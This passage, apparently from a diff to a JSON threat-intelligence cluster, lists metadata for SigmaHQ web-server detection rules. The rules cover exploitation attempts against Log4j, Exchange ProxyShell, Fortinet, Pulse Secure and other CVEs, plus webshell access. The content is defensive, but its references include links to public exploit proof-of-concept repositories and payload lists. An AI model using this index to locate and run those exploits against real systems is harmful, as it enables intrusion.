"https://grafana.com/blog/2021/12/07/grafana-8.3.1-8.2.7-8.1.8-and-8.0.7-released-with-high-severity-security-fix/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_cve_2021_43798_grafana.yml" + ], + "tags": [ + "attack.initial_access", + "attack.t1190" + ] + }, + "uuid": "7b72b328-5708-414f-9a2a-6a6867c26e16", + "value": "Grafana Path Traversal Exploitation CVE-2021-43798" + }, + { + "description": "Detects exploitation attempt using the JDNIExploiit Kit", + "meta": { + "author": "Florian Roth", + "creation_date": "2021/12/12", + "falsepositive": [ + "Legitimate apps the use these paths" + ], + "filename": "web_jndi_exploit.yml", + "level": "high", + "logsource.category": "webserver", + "logsource.product": "No established product", + "refs": [ + "https://githubmemory.com/repo/FunctFan/JNDIExploit", + "https://github.com/pimps/JNDI-Exploit-Kit", + "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_jndi_exploit.yml" + ], + "tags": "No established tags" + }, + "uuid": "412d55bc-7737-4d25-9542-5b396867ce55", + "value": "JNDIExploit Pattern" + }, + { + "description": "Detects exploitation attempt of the CVE-2021-27905 which affects all Apache Solr versions prior to and including 8.8.1.", + "meta": { + "author": "@gott_cyber", + "creation_date": "2022/12/11", + "falsepositive": [ + "Vulnerability Scanners" + ], + "filename": "web_cve_2021_27905_apache_solr_exploit.yml", + "level": "medium", + "logsource.category": "webserver", + "logsource.product": "No established product", + "refs": [ + "https://nsfocusglobal.com/apache-solr-arbitrary-file-read-and-ssrf-vulnerability-threat-alert/", + "https://twitter.com/sec715/status/1373472323538362371", + "https://mp.weixin.qq.com/s?__biz=Mzg3NDU2MTg0Ng==&mid=2247484117&idx=1&sn=2fdab8cbe4b873f8dd8abb35d935d186", + "https://twitter.com/Al1ex4/status/1382981479727128580", + "https://github.com/murataydemir/CVE-2021-27905", + "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_cve_2021_27905_apache_solr_exploit.yml" + ], + "tags": [ + "attack.initial_access", + "attack.t1190", + "cve.2021.27905" + ] + }, + "uuid": "0bbcd74b-0596-41a4-94a0-4e88a76ffdb3", + "value": "Potential CVE-2021-27905 Exploitation Attempt" + }, + { + "description": "Detects an attempt to leverage the vulnerable servlet \"mboximport\" for an unauthenticated remote command injection", + "meta": { + "author": "@gott_cyber", + "creation_date": "2022/08/17", + "falsepositive": [ + "Unknown" + ], + "filename": "web_cve_2022_27925_exploit.yml", + "level": "medium", + "logsource.category": "webserver", + "logsource.product": "No established product", + "refs": [ + "https://www.volexity.com/blog/2022/08/10/mass-exploitation-of-unauthenticated-zimbra-rce-cve-2022-27925/", + "https://github.com/vnhacker1337/CVE-2022-27925-PoC", + "https://www.yang99.top/index.php/archives/82/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_cve_2022_27925_exploit.yml" + ], + "tags": [ + "attack.initial_access", + "attack.t1190", + "cve.2022.27925" + ] + }, + "uuid": "dd218fb6-4d02-42dc-85f0-a0a376072efd", + "value": "Zimbra Collaboration Suite Email Server Unauthenticated RCE" + }, + { + "description": "Detects attempts to exploit the Atlassian Bitbucket Command Injection CVE-2022-36804", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/09/29", + "falsepositive": [ + "Web vulnerability scanners" + ], + "filename": "web_cve_2022_36804_atlassian_bitbucket_command_injection.yml", + "level": "high", + "logsource.category": "webserver", + "logsource.product": "No established product", + "refs": [ + "https://confluence.atlassian.com/bitbucketserver/bitbucket-server-and-data-center-advisory-2022-08-24-1155489835.html", + "https://blog.assetnote.io/2022/09/14/rce-in-bitbucket-server/", + "https://twitter.com/_0xf4n9x_/status/1572052954538192901", + "https://www.rapid7.com/blog/post/2022/09/20/cve-2022-36804-easily-exploitable-vulnerability-in-atlassian-bitbucket-server-and-data-center/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_cve_2022_36804_atlassian_bitbucket_command_injection.yml" + ], + "tags": [ + "attack.initial_access", + "attack.t1190", + "cve.2022.36804" + ] + }, + "uuid": "65c0a0ab-d675-4441-bd6b-d3db226a2685", + "value": "Atlassian Bitbucket Command Injection Via Archive API" + }, + { + "description": "Detects SQL Injection attempts via GET requests in access logs", + "meta": { + "author": "Saw Win Naung, Nasreddine Bencherchali", + "creation_date": "2020/02/22", + "falsepositive": [ + "Java scripts and CSS Files", + "User searches in search boxes of the respective website", + "Internal vulnerability scanners can cause some serious FPs when used, if you experience a lot of FPs due to this think of adding more filters such as \"User Agent\" strings and more response codes" + ], + "filename": "web_sql_injection_in_access_logs.yml", + "level": "high", + "logsource.category": "webserver", + "logsource.product": "No established product", + "refs": [ + "https://www.acunetix.com/blog/articles/using-logs-to-investigate-a-web-application-attack/", + "https://www.acunetix.com/blog/articles/exploiting-sql-injection-example/", + "https://github.com/payloadbox/sql-injection-payload-list", + "https://brightsec.com/blog/sql-injection-payloads/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_sql_injection_in_access_logs.yml" + ], + "tags": "No established tags" + }, + "uuid": "5513deaf-f49a-46c2-a6c8-3f111b5cb453", + "value": "SQL Injection Strings" + }, + { + "description": "Detects exploitation attempt of the OWASSRF variant targeting exchange servers using publicly available POC. It uses the OWA endpoint to access the powershell backend endpoint", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/12/22", + "falsepositive": [ + "Unlikely" + ], + "filename": "web_exchange_owassrf_poc_exploitation.yml", + "level": "critical", + "logsource.category": "webserver", + "logsource.product": "No established product", + "refs": [ + "https://twitter.com/purp1ew0lf/status/1602989967776808961?s=12&t=OkZJl_ViICeiftVEsohRyw", + "https://www.rapid7.com/blog/post/2022/12/21/cve-2022-41080-cve-2022-41082-rapid7-observed-exploitation-of-owassrf-in-exchange-for-rce/", + "https://www.crowdstrike.com/blog/owassrf-exploit-analysis-and-recommendations/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_exchange_owassrf_poc_exploitation.yml" + ], + "tags": [ + "attack.initial_access", + "attack.t1190" + ] + }, + "uuid": "92d78c63-5a5c-4c40-9b60-463810ffb082", + "value": "OWASSRF Exploitation Attempt Using Public POC - Webserver" + }, + { + "description": "Detects the exploitation of the Wazuh RCE vulnerability described in CVE-2021-26814", + "meta": { + "author": "Florian Roth", + "creation_date": "2021/05/22", + "falsepositive": [ + "Unknown" + ], + "filename": "web_cve_2021_26814_wzuh_rce.yml", + "level": "high", + "logsource.category": "webserver", + "logsource.product": "No established product", + "refs": [ + "https://github.com/WickdDavid/CVE-2021-26814/blob/6a17355a10ec4db771d0f112cbe031e418d829d5/PoC.py", + "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_cve_2021_26814_wzuh_rce.yml" + ], + "tags": [ + "attack.initial_access", + "attack.t1190", + "cve.2021.21978", + "cve.2021.26814" + ] + }, + "uuid": "b9888738-29ed-4c54-96a4-f38c57b84bb3", + "value": "Exploitation of CVE-2021-26814 in Wazuh" + }, + { + "description": "Detects exploitation attempt of the OWASSRF variant targeting exchange servers It uses the OWA endpoint to access the powershell backend endpoint", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/12/22", + "falsepositive": [ + "Web vulnerability scanners" + ], + "filename": "web_exchange_owassrf_exploitation.yml", + "level": "high", + "logsource.category": "webserver", + "logsource.product": "No established product", + "refs": [ + "https://www.rapid7.com/blog/post/2022/12/21/cve-2022-41080-cve-2022-41082-rapid7-observed-exploitation-of-owassrf-in-exchange-for-rce/", + "https://www.crowdstrike.com/blog/owassrf-exploit-analysis-and-recommendations/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_exchange_owassrf_exploitation.yml" + ], + "tags": [ + "attack.initial_access", + "attack.t1190" + ] + }, + "uuid": "181f49fa-0b21-4665-a98c-a57025ebb8c7", + "value": "Potential OWASSRF Exploitation Attempt - Webserver" + }, + { + "description": "Detects a core dump of a crashing Nginx worker process, which could be a signal of a serious problem or exploitation attempts.", + "meta": { + "author": "Florian Roth", + "creation_date": "2021/05/31", + "falsepositive": [ + "Serious issues with a configuration or plugin" + ], + "filename": "web_nginx_core_dump.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "No established product", + "refs": [ + "https://docs.nginx.com/nginx/admin-guide/monitoring/debugging/#enabling-core-dumps", + "https://www.x41-dsec.de/lab/advisories/x41-2021-002-nginx-resolver-copy/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_nginx_core_dump.yml" + ], + "tags": [ + "attack.impact", + "attack.t1499.004" + ] + }, + "uuid": "59ec40bb-322e-40ab-808d-84fa690d7e56", + "value": "Nginx Core Dump" + }, + { + "description": "This rule detects exploitation attempts using Pulse Connect Secure(PCS) vulnerability (CVE-2021-22893)", + "meta": { + "author": "Sittikorn S", + "creation_date": "2021/06/29", + "falsepositive": [ + "Vulnerability Scanning" + ], + "filename": "web_cve_2021_22893_pulse_secure_rce_exploit.yml", + "level": "high", + "logsource.category": "webserver", + "logsource.product": "No established product", + "refs": [ + "https://www.fireeye.com/blog/threat-research/2021/04/suspected-apt-actors-leverage-bypass-techniques-pulse-secure-zero-day.html", + "https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44784", + "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_cve_2021_22893_pulse_secure_rce_exploit.yml" + ], + "tags": [ + "attack.initial_access", + "attack.t1190" + ] + }, + "uuid": "5525edac-f599-4bfd-b926-3fa69860e766", + "value": "Pulse Connect Secure RCE Attack CVE-2021-22893" + }, + { + "description": "MODx manager - Local File Inclusion:Directory traversal vulnerability in manager/controllers/default/resource/tvs.php in MODx Revolution 2.0.2-pl, and possibly earlier,\nwhen magic_quotes_gpc is disabled, allows remote attackers to read arbitrary files via a .. (dot dot) in the class_key parameter.\n", + "meta": { + "author": "Subhash Popuri (@pbssubhash)", + "creation_date": "2021/08/25", + "falsepositive": [ + "Scanning from Nuclei", + "Unknown" + ], + "filename": "web_cve_2010_5278_exploitation_attempt.yml", + "level": "critical", + "logsource.category": "webserver", + "logsource.product": "No established product", + "refs": [ + "https://github.com/projectdiscovery/nuclei-templates", + "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_cve_2010_5278_exploitation_attempt.yml" + ], + "tags": [ + "attack.initial_access", + "attack.t1190" + ] + }, + "uuid": "a4a899e8-fd7a-49dd-b5a8-7044def72d61", + "value": "CVE-2010-5278 Exploitation Attempt" + }, + { + "description": "Detects source code enumeration that use GET requests by keyword searches in URL strings", + "meta": { + "author": "James Ahearn", + "creation_date": "2019/06/08", + "falsepositive": [ + "Unknown" + ], + "filename": "web_source_code_enumeration.yml", + "level": "medium", + "logsource.category": "webserver", + "logsource.product": "No established product", + "refs": [ + "https://pentester.land/tutorials/2018/10/25/source-code-disclosure-via-exposed-git-folder.html", + "https://medium.com/@logicbomb_1/bugbounty-how-i-was-able-to-download-the-source-code-of-indias-largest-telecom-service-52cf5c5640a1", + "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_source_code_enumeration.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1083" + ] + }, + "uuid": "953d460b-f810-420a-97a2-cfca4c98e602", + "value": "Source Code Enumeration Detection by Keyword" + }, + { + "description": "Detects the exploitation attempt of the vulnerability found in F5 BIG-IP and described in CVE-2020-5902", + "meta": { + "author": "Florian Roth", + "creation_date": "2020/07/05", + "falsepositive": [ + "Unknown" + ], + "filename": "web_cve_2020_5902_f5_bigip.yml", + "level": "critical", + "logsource.category": "webserver", + "logsource.product": "No established product", + "refs": [ + "https://support.f5.com/csp/article/K52145254", + "https://twitter.com/yorickkoster/status/1279709009151434754", + "https://www.ptsecurity.com/ww-en/about/news/f5-fixes-critical-vulnerability-discovered-by-positive-technologies-in-big-ip-application-delivery-controller/", + "https://www.criticalstart.com/f5-big-ip-remote-code-execution-exploit/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_cve_2020_5902_f5_bigip.yml" + ], + "tags": [ + "attack.initial_access", + "attack.t1190" + ] + }, + "uuid": "44b53b1c-e60f-4a7b-948e-3435a7918478", + "value": "CVE-2020-5902 F5 BIG-IP Exploitation Attempt" + }, + { + "description": "Detects the exploitation of VSphere Remote Code Execution vulnerability as described in CVE-2021-21972", + "meta": { + "author": "Bhabesh Raj", + "creation_date": "2021/02/24", + "falsepositive": [ + "OVA uploads to your VSphere appliance" + ], + "filename": "web_cve_2021_21972_vsphere_unauth_rce_exploit.yml", + "level": "high", + "logsource.category": "webserver", + "logsource.product": "No established product", + "refs": [ + "https://www.vmware.com/security/advisories/VMSA-2021-0002.html", + "https://swarm.ptsecurity.com/unauth-rce-vmware", + "https://f5.pm/go-59627.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_cve_2021_21972_vsphere_unauth_rce_exploit.yml" + ], + "tags": [ + "attack.initial_access", + "attack.t1190" + ] + }, + "uuid": "179ed852-0f9b-4009-93a7-68475910fd86", + "value": "CVE-2021-21972 VSphere Exploitation" + }, + { + "description": "Detects possible exploitation activity or bugs in a web application", + "meta": { + "author": "Thomas Patzke", + "creation_date": "2017/02/19", + "falsepositive": [ + "Unstable application", + "Application that misuses the response codes" + ], + "filename": "web_multiple_susp_resp_codes_single_source.yml", + "level": "medium", + "logsource.category": "webserver", + "logsource.product": "No established product", + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_multiple_susp_resp_codes_single_source.yml" + ], + "tags": [ + "attack.initial_access", + "attack.t1190" + ] + }, + "uuid": "6fdfc796-06b3-46e8-af08-58f3505318af", + "value": "Multiple Suspicious Resp Codes Caused by Single Client" + }, + { + "description": "Detects potential exploitation attempts that target the Cacti Command Injection CVE-2022-46169", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/12/27", + "falsepositive": [ + "Web vulnerability scanners" + ], + "filename": "web_cve_2022_46169_cacti_exploitation_attempt.yml", + "level": "high", + "logsource.category": "webserver", + "logsource.product": "No established product", + "refs": [ + "https://github.com/0xf4n9x/CVE-2022-46169", + "https://github.com/Cacti/cacti/security/advisories/GHSA-6p93-p743-35gf", + "https://github.com/rapid7/metasploit-framework/pull/17407", + "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_cve_2022_46169_cacti_exploitation_attempt.yml" + ], + "tags": [ + "attack.initial_access", + "attack.t1190", + "cve.2022.46169" + ] + }, + "uuid": "738cb115-881f-4df3-82cc-56ab02fc5192", + "value": "Potential CVE-2022-46169 Exploitation Attempt" + }, + { + "description": "Detects exploitation attempt against log4j RCE vulnerability reported as CVE-2021-44228 in different header fields found in web server logs (Log4Shell)", + "meta": { + "author": "Florian Roth", + "creation_date": "2021/12/10", + "falsepositive": [ + "Vulnerability scanning" + ], + "filename": "web_cve_2021_44228_log4j_fields.yml", + "level": "high", + "logsource.category": "webserver", + "logsource.product": "No established product", + "refs": [ + "https://www.lunasec.io/docs/blog/log4j-zero-day/", + "https://github.com/tangxiaofeng7/apache-log4j-poc", + "https://twitter.com/shutingrz/status/1469255861394866177?s=21", + "https://gist.github.com/Neo23x0/e4c8b03ff8cdf1fa63b7d15db6e3860b", + "https://news.ycombinator.com/item?id=29504755", + "https://github.com/YfryTchsGD/Log4jAttackSurface", + "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_cve_2021_44228_log4j_fields.yml" + ], + "tags": [ + "attack.initial_access", + "attack.t1190" + ] + }, + "uuid": "9be472ed-893c-4ec0-94da-312d2765f654", + "value": "Log4j RCE CVE-2021-44228 in Fields" + }, + { + "description": "Detects access to DEWMODE webshell as described in FIREEYE report", + "meta": { + "author": "Florian Roth", + "creation_date": "2021/02/22", + "falsepositive": [ + "Unknown" + ], + "filename": "web_unc2546_dewmode_php_webshell.yml", + "level": "high", + "logsource.category": "webserver", + "logsource.product": "No established product", + "refs": [ + "https://www.fireeye.com/blog/threat-research/2021/02/accellion-fta-exploited-for-data-theft-and-extortion.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_unc2546_dewmode_php_webshell.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1505.003" + ] + }, + "uuid": "fdf96c90-42d5-4406-8a9c-14a2c9a016b5", + "value": "DEWMODE Webshell Access" + }, + { + "description": "Detects CVE-2019-11510 exploitation attempt - URI contains Guacamole", + "meta": { + "author": "Florian Roth", + "creation_date": "2019/11/18", + "falsepositive": [ + "Unknown" + ], + "filename": "web_cve_2019_11510_pulsesecure_exploit.yml", + "level": "critical", + "logsource.category": "webserver", + "logsource.product": "No established product", + "refs": [ + "https://www.exploit-db.com/exploits/47297", + "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_cve_2019_11510_pulsesecure_exploit.yml" + ], + "tags": [ + "attack.initial_access", + "attack.t1190" + ] + }, + "uuid": "2dbc10d7-a797-49a8-8776-49efa6442e60", + "value": "Pulse Secure Attack CVE-2019-11510" + }, + { + "description": "Detects possible Java payloads in web access logs", + "meta": { + "author": "frack113", + "creation_date": "2022/06/04", + "falsepositive": [ + "Legitimate apps" + ], + "filename": "web_java_payload_in_access_logs.yml", + "level": "high", + "logsource.category": "webserver", + "logsource.product": "No established product", + "refs": [ + "https://twitter.com/httpvoid0x2f/status/1532924261035384832", + "https://github.com/httpvoid/writeups/blob/62d3751945289d088ccfdf4d0ffbf61598a2cd7d/Confluence-RCE.md", + "https://www.rapid7.com/blog/post/2021/09/02/active-exploitation-of-confluence-server-cve-2021-26084/", + "https://www.rapid7.com/blog/post/2022/06/02/active-exploitation-of-confluence-cve-2022-26134/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_java_payload_in_access_logs.yml" + ], + "tags": [ + "cve.2022.26134", + "cve.2021.26084" + ] + }, + "uuid": "583aa0a2-30b1-4d62-8bf3-ab73689efe6c", + "value": "Java Payload Strings" + }, + { + "description": "Detects successful exploitation of Exchange vulnerability as reported in CVE-2021-28480", + "meta": { + "author": "Florian Roth", + "creation_date": "2021/05/14", + "falsepositive": [ + "Unknown" + ], + "filename": "web_cve_2021_28480_exchange_exploit.yml", + "level": "critical", + "logsource.category": "webserver", + "logsource.product": "No established product", + "refs": [ + "https://twitter.com/GossiTheDog/status/1392965209132871683?s=20", + "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_cve_2021_28480_exchange_exploit.yml" + ], + "tags": [ + "attack.initial_access", + "attack.t1190" + ] + }, + "uuid": "a2a9d722-0acb-4096-bccc-daaf91a5037b", + "value": "Exchange Exploitation CVE-2021-28480" + }, + { + "description": "Detects XSS attempts injected via GET requests in access logs", + "meta": { + "author": "Saw Win Naung, Nasreddine Bencherchali", + "creation_date": "2021/08/15", + "falsepositive": [ + "JavaScripts,CSS Files and PNG files", + "User searches in search boxes of the respective website", + "Internal vulnerability scanners can cause some serious FPs when used, if you experience a lot of FPs due to this think of adding more filters such as \"User Agent\" strings and more response codes" + ], + "filename": "web_xss_in_access_logs.yml", + "level": "high", + "logsource.category": "webserver", + "logsource.product": "No established product", + "refs": [ + "https://portswigger.net/web-security/cross-site-scripting/contexts", + "https://github.com/payloadbox/xss-payload-list", + "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_xss_in_access_logs.yml" + ], + "tags": "No established tags" + }, + "uuid": "65354b83-a2ea-4ea6-8414-3ab38be0d409", + "value": "Cross Site Scripting Strings" + }, + { + "description": "Detects the exploitation of the WebLogic server vulnerability described in CVE-2021-2109", + "meta": { + "author": "Bhabesh Raj", + "creation_date": "2021/01/20", + "falsepositive": [ + "Unknown" + ], + "filename": "web_cve_2021_2109_weblogic_rce_exploit.yml", + "level": "critical", + "logsource.category": "webserver", + "logsource.product": "No established product", + "refs": [ + "https://mp.weixin.qq.com/s/wX9TMXl1KVWwB_k6EZOklw", + "https://twitter.com/pyn3rd/status/1351696768065409026", + "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_cve_2021_2109_weblogic_rce_exploit.yml" + ], + "tags": [ + "attack.t1190", + "attack.initial_access", + "cve.2021.2109" + ] + }, + "uuid": "687f6504-7f44-4549-91fc-f07bab065821", + "value": "Oracle WebLogic Exploit CVE-2021-2109" + }, + { + "description": "Detects path traversal exploitation attempts", + "meta": { + "author": "Subhash Popuri (@pbssubhash), Florian Roth (generalisation)", + "creation_date": "2021/09/25", + "falsepositive": [ + "Happens all the time on systems exposed to the Internet", + "Internal vulnerability scanners" + ], + "filename": "web_path_traversal_exploitation_attempt.yml", + "level": "medium", + "logsource.category": "webserver", + "logsource.product": "No established product", + "refs": [ + "https://github.com/projectdiscovery/nuclei-templates", + "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_path_traversal_exploitation_attempt.yml" + ], + "tags": [ + "attack.initial_access", + "attack.t1190" + ] + }, + "uuid": "7745c2ea-24a5-4290-b680-04359cb84b35", + "value": "Path Traversal Exploitation Attempts" + }, + { + "description": "Detects exploitation attempts of Sitecore Experience Platform Pre-Auth RCE CVE-2021-42237 found in Report.ashx", + "meta": { + "author": "Florian Roth", + "creation_date": "2021/11/17", + "falsepositive": [ + "Vulnerability Scanning" + ], + "filename": "web_cve_2021_42237_sitecore_report_ashx.yml", + "level": "high", + "logsource.category": "webserver", + "logsource.product": "No established product", + "refs": [ + "https://blog.assetnote.io/2021/11/02/sitecore-rce/", + "https://support.sitecore.com/kb?id=kb_article_view&sysparm_article=KB1000776", + "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_cve_2021_42237_sitecore_report_ashx.yml" + ], + "tags": [ + "attack.initial_access", + "attack.t1190" + ] + }, + "uuid": "20c6ed1c-f7f0-4ea3-aa65-4f198e6acb0f", + "value": "Sitecore Pre-Auth RCE CVE-2021-42237" + }, + { + "description": "Detects attempts to exploit an apache spark server via CVE-2014-6287 from a weblogs perspective", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/07/19", + "falsepositive": [ + "Web vulnerability scanners" + ], + "filename": "web_cve_2022_33891_spark_shell_command_injection.yml", + "level": "high", + "logsource.category": "webserver", + "logsource.product": "No established product", + "refs": [ + "https://github.com/W01fh4cker/cve-2022-33891/blob/fd973b56e78bca8822caa3a2e3cf1b5aff5d0950/cve_2022_33891_poc.py", + "https://sumsec.me/2022/CVE-2022-33891%20Apache%20Spark%20shell%20command%20injection.html", + "https://github.com/apache/spark/pull/36315/files", + "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_cve_2022_33891_spark_shell_command_injection.yml" + ], + "tags": [ + "attack.initial_access", + "attack.t1190", + "cve.2022.33891" + ] + }, + "uuid": "1a9a04fd-02d1-465c-abad-d733fd409f9c", + "value": "Apache Spark Shell Command Injection - Weblogs" + }, + { + "description": "Detects known suspicious (default) user-agents related to scanning/recon tools", + "meta": { + "author": "Nasreddine Bencherchali, Tim Shelton", + "creation_date": "2022/07/19", + "falsepositive": [ + "Unknown" + ], + "filename": "web_susp_useragents.yml", + "level": "medium", + "logsource.category": "webserver", + "logsource.product": "No established product", + "refs": [ + "https://github.com/wpscanteam/wpscan/blob/196fbab5b1ce3870a43515153d4f07878a89d410/lib/wpscan/browser.rb", + "https://github.com/xmendez/wfuzz/blob/1b695ee9a87d66a7d7bf6cae70d60a33fae51541/docs/user/basicusage.rst", + "https://github.com/lanmaster53/recon-ng/blob/9e907dfe09fce2997f0301d746796408e01a60b7/recon/core/base.py#L92", + "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_susp_useragents.yml" + ], + "tags": [ + "attack.initial_access", + "attack.t1190" + ] + }, + "uuid": "19aa4f58-94ca-45ff-bc34-92e533c0994a", + "value": "Suspicious User-Agents Related To Recon Tools" + }, + { + "description": "Detects possible exploitation of VMware Workspace ONE Access Admin Remote Code Execution vulnerability as described in CVE-2022-31659", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/08/12", + "falsepositive": [ + "Vulnerability scanners", + "Legitimate access to the URI" + ], + "filename": "web_cve_2022_31659_vmware_rce.yml", + "level": "medium", + "logsource.category": "webserver", + "logsource.product": "No established product", + "refs": [ + "https://petrusviet.medium.com/dancing-on-the-architecture-of-vmware-workspace-one-access-eng-ad592ae1b6dd", + "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_cve_2022_31659_vmware_rce.yml" + ], + "tags": [ + "attack.initial_access", + "attack.t1190" + ] + }, + "uuid": "efdb2003-a922-48aa-8f37-8b80021a9706", + "value": "CVE-2022-31659 VMware Workspace ONE Access RCE" + }, + { + "description": "Detects CVE-2018-13379 exploitation attempt against Fortinet SSL VPNs", + "meta": { + "author": "Bhabesh Raj", + "creation_date": "2020/12/08", + "falsepositive": [ + "Unknown" + ], + "filename": "web_cve_2018_13379_fortinet_preauth_read_exploit.yml", + "level": "critical", + "logsource.category": "webserver", + "logsource.product": "No established product", + "refs": [ + "https://devco.re/blog/2019/08/09/attacking-ssl-vpn-part-2-breaking-the-Fortigate-ssl-vpn/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_cve_2018_13379_fortinet_preauth_read_exploit.yml" + ], + "tags": [ + "attack.initial_access", + "attack.t1190" + ] + }, + "uuid": "a2e97350-4285-43f2-a63f-d0daff291738", + "value": "Fortinet CVE-2018-13379 Exploitation" + }, + { + "description": "Detects an issue in apache logs that reports threading related errors", + "meta": { + "author": "Florian Roth", + "creation_date": "2019/01/22", + "falsepositive": [ + "3rd party apache modules - https://bz.apache.org/bugzilla/show_bug.cgi?id=46185" + ], + "filename": "web_apache_threading_error.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "No established product", + "refs": [ + "https://github.com/hannob/apache-uaf/blob/da40f2be3684c8095ec6066fa68eb5c07a086233/README.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_apache_threading_error.yml" + ], + "tags": "No established tags" + }, + "uuid": "e9a2b582-3f6a-48ac-b4a1-6849cdc50b3c", + "value": "Apache Threading Error" + }, + { + "description": "Detects CVE-2021-22123 exploitation attempt against Fortinet WAFs", + "meta": { + "author": "Bhabesh Raj, Florian Roth", + "creation_date": "2021/08/19", + "falsepositive": [ + "Unknown" + ], + "filename": "web_cve_2021_22123_fortinet_exploit.yml", + "level": "critical", + "logsource.category": "webserver", + "logsource.product": "No established product", + "refs": [ + "https://www.rapid7.com/blog/post/2021/08/17/fortinet-fortiweb-os-command-injection", + "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_cve_2021_22123_fortinet_exploit.yml" + ], + "tags": [ + "attack.initial_access", + "attack.t1190" + ] + }, + "uuid": "f425637f-891c-4191-a6c4-3bb1b70513b4", + "value": "Fortinet CVE-2021-22123 Exploitation" + }, + { + "description": "Detects URL patterns that could be found in ProxyShell exploitation attempts against Exchange servers (failed and successful)", + "meta": { + "author": "Florian Roth, Rich Warren", + "creation_date": "2021/08/07", + "falsepositive": [ + "Unknown" + ], + "filename": "web_exchange_proxyshell.yml", + "level": "high", + "logsource.category": "webserver", + "logsource.product": "No established product", + "refs": [ + "https://youtu.be/5mqid-7zp8k?t=2231", + "https://peterjson.medium.com/reproducing-the-proxyshell-pwn2own-exploit-49743a4ea9a1", + "https://blog.orange.tw/2021/08/proxylogon-a-new-attack-surface-on-ms-exchange-part-1.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_exchange_proxyshell.yml" + ], + "tags": [ + "attack.initial_access", + "attack.t1190" + ] + }, + "uuid": "23eee45e-933b-49f9-ae1b-df706d2d52ef", + "value": "Exchange ProxyShell Pattern" + }, + { + "description": "Detects URP patterns and status codes that indicate a successful ProxyShell exploitation attack against Exchange servers", + "meta": { + "author": "Florian Roth, Rich Warren", + "creation_date": "2021/08/09", + "falsepositive": [ + "Unknown" + ], + "filename": "web_exchange_proxyshell_successful.yml", + "level": "critical", + "logsource.category": "webserver", + "logsource.product": "No established product", + "refs": [ + "https://youtu.be/5mqid-7zp8k?t=2231", + "https://peterjson.medium.com/reproducing-the-proxyshell-pwn2own-exploit-49743a4ea9a1", + "https://blog.orange.tw/2021/08/proxylogon-a-new-attack-surface-on-ms-exchange-part-1.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_exchange_proxyshell_successful.yml" + ], + "tags": [ + "attack.initial_access" + ] + }, + "uuid": "992be1eb-e5da-437e-9a54-6d13b57bb4d8", + "value": "Successful Exchange ProxyShell Attack" + }, + { + "description": "Certain strings in the uri_query field when combined with null referer and null user agent can indicate activity associated with the webshell ReGeorg.", + "meta": { + "author": "Cian Heasley", + "creation_date": "2020/08/04", + "falsepositive": [ + "Web applications that use the same URL parameters as ReGeorg" + ], + "filename": "web_webshell_regeorg.yml", + "level": "high", + "logsource.category": "webserver", + "logsource.product": "No established product", + "refs": [ + "https://github.com/sensepost/reGeorg", + "https://community.rsa.com/community/products/netwitness/blog/2019/02/19/web-shells-and-netwitness-part-3", + "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_webshell_regeorg.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1505.003" + ] + }, + "uuid": "2ea44a60-cfda-11ea-87d0-0242ac130003", + "value": "Webshell ReGeorg Detection Via Web Logs" + }, + { + "description": "Detects exploitation attempt against log4j RCE vulnerability reported as CVE-2021-44228 (Log4Shell)", + "meta": { + "author": "Florian Roth", + "creation_date": "2021/12/10", + "falsepositive": [ + "Vulnerability scanning" + ], + "filename": "web_cve_2021_44228_log4j.yml", + "level": "high", + "logsource.category": "webserver", + "logsource.product": "No established product", + "refs": [ + "https://www.lunasec.io/docs/blog/log4j-zero-day/", + "https://github.com/tangxiaofeng7/apache-log4j-poc", + "https://twitter.com/shutingrz/status/1469255861394866177?s=21", + "https://gist.github.com/Neo23x0/e4c8b03ff8cdf1fa63b7d15db6e3860b", + "https://news.ycombinator.com/item?id=29504755", + "https://github.com/YfryTchsGD/Log4jAttackSurface", + "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_cve_2021_44228_log4j.yml" + ], + "tags": [ + "attack.initial_access", 